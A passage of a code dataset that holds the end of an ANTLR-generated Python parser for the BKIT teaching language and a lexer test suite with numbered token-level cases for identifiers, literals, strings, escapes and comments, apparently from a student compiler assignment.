BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 358\n self.expr5()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr5Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def UN_OP(self):\n return self.getToken(BKITParser.UN_OP, 0)\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def expr6(self):\n return self.getTypedRuleContext(BKITParser.Expr6Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr5\n\n\n\n\n def expr5(self):\n\n localctx = BKITParser.Expr5Context(self, self._ctx, self.state)\n self.enterRule(localctx, 60, self.RULE_expr5)\n try:\n self.state = 364\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.UN_OP]:\n self.enterOuterAlt(localctx, 1)\n self.state = 361\n self.match(BKITParser.UN_OP)\n self.state = 362\n self.expr5()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 363\n self.expr6()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr6Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr6\n\n\n\n\n def expr6(self):\n\n localctx = BKITParser.Expr6Context(self, self._ctx, self.state)\n self.enterRule(localctx, 62, self.RULE_expr6)\n try:\n self.state = 370\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,32,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 366\n self.expr7()\n self.state = 367\n self.index_op()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 369\n self.expr7()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr7Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def expr8(self):\n return self.getTypedRuleContext(BKITParser.Expr8Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr7\n\n\n\n\n def expr7(self):\n\n localctx = BKITParser.Expr7Context(self, self._ctx, self.state)\n self.enterRule(localctx, 64, self.RULE_expr7)\n try:\n self.state = 374\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,33,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 372\n self.function_call()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 373\n self.expr8()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr8Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr8\n\n\n\n\n def expr8(self):\n\n localctx = BKITParser.Expr8Context(self, self._ctx, self.state)\n self.enterRule(localctx, 66, self.RULE_expr8)\n try:\n self.state = 381\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 1)\n self.state = 376\n self.operand()\n pass\n elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 377\n self.match(BKITParser.LEFT_PAREN)\n self.state = 378\n self.expr()\n self.state = 379\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self):\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 68, self.RULE_operand)\n try:\n self.state = 386\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 383\n self.var_non_init()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.enterOuterAlt(localctx, 2)\n self.state = 384\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 3)\n self.state = 385\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_callContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_call\n\n\n\n\n def function_call(self):\n\n localctx = BKITParser.Function_callContext(self, self._ctx, self.state)\n self.enterRule(localctx, 70, self.RULE_function_call)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 388\n self.match(BKITParser.ID)\n self.state = 389\n self.match(BKITParser.LEFT_PAREN)\n self.state = 400\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.UN_LOGICAL_OP) | (1 << BKITParser.UN_OP) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 390\n self.expr()\n self.state = 395\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 391\n self.match(BKITParser.COMMA)\n self.state = 392\n self.expr()\n self.state = 397\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 402\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 403\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Index_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACKET(self):\n return self.getToken(BKITParser.LEFT_BRACKET, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_BRACKET(self):\n return self.getToken(BKITParser.RIGHT_BRACKET, 0)\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_index_op\n\n\n\n\n def index_op(self):\n\n localctx = BKITParser.Index_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 72, self.RULE_index_op)\n try:\n self.state = 414\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,38,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 405\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 406\n self.expr()\n self.state = 407\n self.match(BKITParser.RIGHT_BRACKET)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 409\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 410\n self.expr()\n self.state = 411\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 412\n self.index_op()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[26] = self.expr1_sempred\n self._predicates[27] = self.expr2_sempred\n self._predicates[28] = self.expr3_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr3_sempred(self, localctx:Expr3Context, predIndex:int):\n if predIndex == 2:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.5216096043586731, "alphanum_fraction": 0.5578612685203552, "avg_line_length": 28.471725463867188, "blob_id": "8da7e5b7366c05bf56ba29a1478a76109faa9005", "content_id": "3f2bc4bff6561e357782a96db285d4e792e1d477", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19806, "license_type": "no_license", "max_line_length": 102, "num_lines": 672, "path": "/Assignments/assignment1/src/test/LexerSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestLexer\n\nclass LexerSuite(unittest.TestCase):\n \n def test_lower_identifier(self):\n \"\"\"test identifiers\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"abc\",\"abc,<EOF>\",101))\n\n def test_lower_upper_id(self):\n self.assertTrue(TestLexer.checkLexeme(\"Var\",\"Var,<EOF>\",102))\n\n def test_wrong_token(self):\n self.assertTrue(TestLexer.checkLexeme(\"ab?svn\",\"ab,ERROR_CHAR ?\",103))\n\n def test_integer(self):\n \"\"\"test integers\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"Var x;\",\"Var,x,;,<EOF>\",104))\n\n def test_illegal_escape(self):\n \"\"\"test illegal escape\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"abc\\\\h def\" \"\"\",\"\"\"ILLEGAL_ESCAPE abc\\\\h\"\"\",105))\n\n def test_unterminated_string(self):\n \"\"\"test unclosed string\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"abc def \"\"\",\"\"\"UNCLOSE_STRING abc def \"\"\",106))\n\n def test_normal_string_with_escape(self):\n \"\"\"test normal string with escape\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"ab'\"c\\\\n def\" \"\"\",\"\"\"ab'\"c\\\\n def,<EOF>\"\"\",107))\n \n def test_simple_array(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"{1, 2, 3, 4}\"\"\", \"\"\"{,1,,,2,,,3,,,4,},<EOF>\"\"\", 108))\n\n def test_int(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"0123\"\"\", \"\"\"0,123,<EOF>\"\"\", 109))\n\n def test_unterminated_comment(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"**abvc\"\"\", \"\"\"UNTERMINATED_COMMENT\"\"\", 110))\n \n def test_hexa_var_declare(self):\n input=\"\"\"Var x=0x12;\"\"\"\n expect=\"\"\"Var,x,=,0x12,;,<EOF>\"\"\"\n num=111\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_assign_stmt(self):\n input=\"\"\"a=12+3;\"\"\"\n expect=\"\"\"a,=,12,+,3,;,<EOF>\"\"\"\n num=112\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_function_name_declare(self):\n input=\"\"\"Function: main\"\"\"\n expect=\"\"\"Function,:,main,<EOF>\"\"\"\n num=113\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_dec_hex_same_array(self):\n input=\"\"\"x={{12,0x12}}\"\"\"\n expect=\"\"\"x,=,{,{,12,,,0x12,},},<EOF>\"\"\"\n num=114\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_normal_string(self):\n input=\"\"\"\\\"this is a string\\\"\"\"\"\n expect=\"\"\"this is a string,<EOF>\"\"\"\n num=115\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n def test_unclose_string_without_escape(self):\n input=\"\"\"\\\"this is an unclose_string\"\"\"\n expect=\"\"\"UNCLOSE_STRING this is an unclose_string\"\"\"\n num=116\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_legal_esc(self):\n input=\"\"\"\\\" this is a string contain some legal esc: \\\\',\\\\b,\\\\t\\\"\"\"\"\n expect=\"\"\" this is a string contain some legal esc: \\\\',\\\\b,\\\\t,<EOF>\"\"\"\n num=117\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_illegal_esc(self):\n input=\"\"\"\\\" this is a string with illegal escape \\\\h\\\"\"\"\"\n expect=\"\"\"ILLEGAL_ESCAPE this is a string with illegal escape \\\\h\"\"\"\n num=118\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_double_quote_in_string(self):\n input=\"\"\"\\\"string with quote '\"can be exp'\"\\\"\"\"\"\n expect=\"\"\"string with quote '\"can be exp'\",<EOF>\"\"\"\n num=119\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_zero_started_float(self):\n input=\"\"\"0e0\"\"\"\n expect=\"\"\"0e0,<EOF>\"\"\"\n num=120\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_zero_started_2_float(self):\n input=\"\"\"01e0\"\"\"\n expect=\"\"\"01e0,<EOF>\"\"\"\n num=121\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_float_without_right_part(self):\n input=\"\"\"12000.\"\"\"\n expect=\"\"\"12000.,<EOF>\"\"\"\n num=122\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_hexa_capital_num(self):\n input=\"\"\"0xFF\"\"\"\n expect=\"\"\"0xFF,<EOF>\"\"\"\n num=123\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_octal_capital(self):\n input=\"\"\"0O456\"\"\"\n expect=\"\"\"0O456,<EOF>\"\"\"\n num=124\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_zero(self):\n input=\"\"\"0\"\"\"\n expect=\"\"\"0,<EOF>\"\"\"\n num=125\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_zero_started_hexa(self):\n input=\"\"\"0x\"\"\"\n expect=\"\"\"0,x,<EOF>\"\"\"\n num=126\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n \n def test_comment_in_string_esc(self):\n input=\"\"\"\\\"comment in /\\\\'\\\\\\\\string**\\\"\"\"\"\n expect=\"\"\"comment in /\\\\'\\\\\\\\string**,<EOF>\"\"\"\n num=127\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_multi_line_comment(self):\n input=\"\"\"** this\nis a\nmultiline*\ncomment**\"\"\"\n expect=\"\"\"<EOF>\"\"\"\n num=128\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_ambigous_comment(self):\n input=\"\"\"*****\"\"\"\n expect=\"\"\"*,<EOF>\"\"\"\n num=129\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_not_sametype_array(self):\n input=\"\"\"{\"abc\",12}\"\"\"\n expect=\"\"\"{,abc,,,12,},<EOF>\"\"\"\n num=130\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_empty_string(self):\n input=\"\"\"\\\"\\\"\"\"\"\n expect=\"\"\",<EOF>\"\"\"\n num=131\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n def test_sing_quote_esc(self):\n input=\"\"\"\"str with sing quote\\\\'\\\"\"\"\"\n expect=\"\"\"str with sing quote\\\\',<EOF>\"\"\"\n num=132\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_back_slash_legal(self):\n input=\"\"\"\\\"str with back slash \\\\\\\\ legal\\\"\"\"\"\n expect=\"\"\"str with back slash \\\\\\\\ legal,<EOF>\"\"\"\n num=133\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_back_slash_illegal(self):\n input=\"\"\"\\\"str with back slash illegal \\\\\\\"\"\"\"\n expect=\"\"\"ILLEGAL_ESCAPE str with back slash illegal \\\\\\\"\"\"\"\n num=134\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_multi_type_array(self):\n input=\"\"\"{\"abc\",12,12.,True,{12,1e1}}\"\"\"\n expect=\"\"\"{,abc,,,12,,,12.,,,True,,,{,12,,,1e1,},},<EOF>\"\"\"\n num=135\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_simple_expr(self):\n input=\"\"\"a[1]=b+1.0\"\"\"\n expect=\"\"\"a,[,1,],=,b,+,1.0,<EOF>\"\"\"\n num=136\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_complicated_composite_var(self):\n input=\"\"\"a[b[1][3]]\"\"\"\n expect=\"\"\"a,[,b,[,1,],[,3,],],<EOF>\"\"\"\n num=137\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_neg_scientific(self):\n input=\"\"\"1200e-1\"\"\"\n expect=\"\"\"1200e-1,<EOF>\"\"\"\n num=138\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_pos_scientific(self):\n input=\"\"\"122e+1\"\"\"\n expect=\"\"\"122e+1,<EOF>\"\"\"\n num=139\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_while_stmt_test(self):\n input=\"\"\"While (i>1) Do EndWhile.\"\"\"\n expect=\"\"\"While,(,i,>,1,),Do,EndWhile,.,<EOF>\"\"\"\n num=140\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_logical_exp(self):\n input=\"\"\"i && a\"\"\"\n expect=\"\"\"i,&&,a,<EOF>\"\"\"\n num=141\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_relational_exp(self):\n input=\"\"\"i =/= a\"\"\"\n expect=\"\"\"i,=/=,a,<EOF>\"\"\"\n num=142\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_logical_or_exp(self):\n input=\"\"\"i||a\"\"\"\n expect=\"\"\"i,||,a,<EOF>\"\"\"\n num=143\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_logical_not_exp(self):\n input=\"\"\"!a\"\"\"\n expect=\"\"\"!,a,<EOF>\"\"\"\n num=144\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_relation_equal_exp(self):\n input=\"\"\"i==a\"\"\"\n expect=\"\"\"i,==,a,<EOF>\"\"\"\n num=145\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_not_equal_exp(self):\n input=\"\"\"i!=a\"\"\"\n expect=\"\"\"i,!=,a,<EOF>\"\"\"\n num=146\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_sing_compare_exp(self):\n input=\"\"\"i>a\"\"\"\n expect=\"\"\"i,>,a,<EOF>\"\"\"\n num=147\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_doub_compare_exp(self):\n input=\"\"\"i>=a\"\"\"\n expect=\"\"\"i,>=,a,<EOF>\"\"\"\n num=148\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_expr_in_index_expr(self):\n input=\"\"\"a[1+foo(a)]\"\"\"\n expect=\"\"\"a,[,1,+,foo,(,a,),],<EOF>\"\"\"\n num=149\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_mul_expr_in_func_call(self):\n input=\"\"\"foo(a < i, a = a+ 1, b[1])\"\"\"\n expect=\"\"\"foo,(,a,<,i,,,a,=,a,+,1,,,b,[,1,],),<EOF>\"\"\"\n num=150\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_mul_expr_in_assign(self):\n input=\"\"\"a = a + foo(10) + b < 2\"\"\"\n expect=\"\"\"a,=,a,+,foo,(,10,),+,b,<,2,<EOF>\"\"\"\n num=151\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_int_to_float_func(self):\n input=\"\"\"int_of_float(1.02)\"\"\"\n expect=\"\"\"int_of_float,(,1.02,),<EOF>\"\"\"\n num=152\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_float_to_int_func(self):\n input=\"\"\"float_to_int(1.092)\"\"\"\n expect=\"\"\"float_to_int,(,1.092,),<EOF>\"\"\"\n num=153\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_int_of_string_func(self):\n input=\"\"\"int_of_string(\"12\")\"\"\"\n expect=\"\"\"int_of_string,(,12,),<EOF>\"\"\"\n num=154\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_string_of_int_func(self):\n input=\"\"\"string_of_int(12)\"\"\"\n expect=\"\"\"string_of_int,(,12,),<EOF>\"\"\"\n num=155\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_float_of_string_func(self):\n input=\"\"\"float_of_string(\"12.45\")\"\"\"\n expect=\"\"\"float_of_string,(,12.45,),<EOF>\"\"\"\n num=156\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_func_call_in_func(self):\n input=\"\"\"int_of_string(read())\"\"\"\n expect=\"\"\"int_of_string,(,read,(,),),<EOF>\"\"\"\n num=157\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_multi_type_args(self):\n input=\"\"\"function(12,\"ab\",foo(a[1]))\"\"\"\n expect=\"\"\"function,(,12,,,ab,,,foo,(,a,[,1,],),),<EOF>\"\"\"\n num=158\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_array_with_blank(self):\n input=\"\"\"array[1] = {1 , \"asd\", 22, a }\"\"\"\n expect=\"\"\"array,[,1,],=,{,1,,,asd,,,22,,,a,},<EOF>\"\"\"\n num=159\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_unterminated_comment_in_string(self):\n input=\"\"\"\\\"string **this is com\\ment\\\"\"\"\"\n expect=\"\"\"ILLEGAL_ESCAPE string **this is com\\\\m\"\"\"\n num=160\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_illegal_escape_before_comment(self):\n input=\"\"\"\\\"string \\**comment**\\\"\"\"\"\n expect=\"\"\"ILLEGAL_ESCAPE string \\*\"\"\"\n num=161\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_comment_in_expr(self):\n input=\"\"\"{**comment**}\"\"\"\n expect=\"\"\"{,},<EOF>\"\"\"\n num=162\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_arithmetic_op_expr(self):\n input=\"\"\"v = (4 \\. 3.) *. 3.14 * a;\"\"\"\n expect=\"\"\"v,=,(,4,\\.,3.,),*.,3.14,*,a,;,<EOF>\"\"\"\n num=163\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_comment_in_string(self):\n input=\"\"\"\\\"string **comment**\\\"\"\"\"\n expect=\"\"\"string **comment**,<EOF>\"\"\"\n num=164\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_recursive_func_call(self):\n input=\"\"\"foo(foo(foo(foo(foo(\"abc\")))))\"\"\"\n expect=\"\"\"foo,(,foo,(,foo,(,foo,(,foo,(,abc,),),),),),<EOF>\"\"\"\n num=165\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_id_with_under(self):\n input=\"\"\"a_b\"\"\"\n expect=\"\"\"a_b,<EOF>\"\"\"\n num=166\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_wrong_char_in_id(self):\n input=\"\"\"a$b\"\"\"\n expect=\"\"\"a,ERROR_CHAR $\"\"\"\n num=167\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_all_allow_type_in_id(self):\n input=\"\"\"aB9_\"\"\"\n expect=\"\"\"aB9_,<EOF>\"\"\"\n num=168\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_test_neg_num(self):\n input=\"\"\"-12\"\"\"\n expect=\"\"\"-,12,<EOF>\"\"\"\n num=169\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_khanh_str_test(self):\n input=\"\"\"\\\" asdfasd \\\" adfads\\\"\"\"\"\n expect=\"\"\" asdfasd ,adfads,UNCLOSE_STRING \"\"\"\n num=170\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_newline_illegal(self):\n input=\"\"\"\\\"this is\n\"\"\"\n expect=\"\"\"UNCLOSE_STRING this is\\n\"\"\"\n num=171\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_zero_after_octal_prefix(self):\n input=\"\"\"0o0001\"\"\"\n expect=\"\"\"0,o0001,<EOF>\"\"\"\n num=172\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_octal_error_id_error(self):\n input=\"\"\"0O012\"\"\"\n expect=\"\"\"0,ERROR_CHAR O\"\"\"\n num=173\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_err_hex_err_id(self):\n input=\"\"\"0X012\"\"\"\n expect=\"\"\"0,ERROR_CHAR X\"\"\"\n num=174\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_comment_with_illegal_newline(self):\n input=\"\"\"**this\n\\h\n\"shit\"\n**\"\"\"\n expect=\"\"\"<EOF>\"\"\"\n num=175\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_neg_int_lit(self):\n input=\"\"\"-12\"\"\"\n expect=\"\"\"-,12,<EOF>\"\"\"\n num=176\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_neg_hex(self):\n input=\"\"\"-0x12\"\"\"\n expect=\"\"\"-,0x12,<EOF>\"\"\"\n num=177\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_comment_between_lit(self):\n input=\"\"\"-12.**comment**1\"\"\"\n expect=\"\"\"-,12.,1,<EOF>\"\"\"\n num=178\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_normal_float_non_scientific_not(self):\n input=\"\"\"12.1\"\"\"\n expect=\"\"\"12.1,<EOF>\"\"\"\n num=179\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test__zero_after_hex_prefix(self):\n input=\"\"\"0x000\"\"\"\n expect=\"\"\"0,x000,<EOF>\"\"\"\n num=180\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_bool_lit(self):\n input=\"\"\"True False\"\"\"\n expect=\"\"\"True,False,<EOF>\"\"\"\n num=181\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_test_all_legal_esc(self):\n input=\"\"\"\\\"legal \\\\b\\\\t\\\\r\\\\n\\\\f\\\\\\\\\\\\' '\\\"\\\"\"\"\"\n expect=\"\"\"legal 